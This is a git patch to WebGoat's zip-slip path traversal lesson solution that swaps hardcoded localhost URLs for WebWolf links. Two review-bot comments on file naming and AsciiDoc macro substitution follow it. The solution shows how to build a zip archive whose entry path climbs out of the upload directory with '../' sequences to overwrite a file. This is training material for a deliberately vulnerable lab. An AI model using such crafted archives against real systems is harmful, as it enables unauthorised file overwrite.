From 54e115aff05eb9cf155899cdc73651afa7e604f0 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 5 Jan 2023 07:49:15 +0100 Subject: [PATCH] Update the solution with WebWolf URLs The new solution uses WebWolf paths as these will change automatically when a user starts WebGoat on a different port. It no longer depends on the hardcoded port `8080`. --- .../documentation/PathTraversal_zip_slip_solution.adoc | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc index a9a71af73..a324008f4 100644 --- a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc +++ b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc @@ -2,10 +2,10 @@ First, let's create a zip file with an image inside: -[source] +[source, subs="macros"] ---- -curl -o cat.jpg http://localhost:8080/WebGoat/images/cats/1.jpg -zip profile.zip cat.jpg +curl -o webwolf.jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png] +zip profile.zip webwolf.jpg ---- Now let's upload this as our profile image. We can see nothing happens as mentioned in the assignment there is a bug in the software, and the result we see on the screen is: @@ -23,7 +23,7 @@ First, create the directory structure: ---- mkdir -p webGoatTempDir:temppath[]PathTraversal/username:user[] cd webGoatTempDir:temppath[]PathTraversal/username:user[] -curl -o username:user[] http://localhost:8080/WebGoat/images/cats/1.jpg +curl -o username:user[].jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png] zip profile.zip ../../../../../../../..webGoatTempDir:temppath[]PathTraversal/username:user[]/username:user[].jpg ----
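Review bot: in the first hunk (`@@ -2,10 +2,10 @@`), the added curl line downloads `images/wolf.png` but writes it to `webwolf.jpg`, so the zip now carries a PNG under a `.jpg` name. If the lesson does not depend on the extension, name the file `webwolf.png` in both the curl and the `zip profile.zip ...` line; if it does, add a sentence to the solution text saying the extension is what matters and the content type is not checked. Separately, `[source, subs="macros"]` replaces the block's default substitutions rather than adding to them; `subs="+macros"` would keep special-character escaping in place should this block ever gain `<` or `&`.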
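Review bot: in the second hunk (`@@ -23,7 +23,7 @@`), the curl output name changes from `username:user[]` to `username:user[].jpg`, which is a second fix on top of the URL swap: the old line wrote a file without the extension while the following `zip` line archives `username:user[].jpg`. Please mention this in the commit message, since it is not related to the hardcoded port. Also, the `[source ...]` line for this block lies outside the hunk context, so it is worth confirming that it already enables macro substitution; otherwise `webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png]` will render literally here. The PNG-saved-as-`.jpg` naming from the first hunk applies to this line as well.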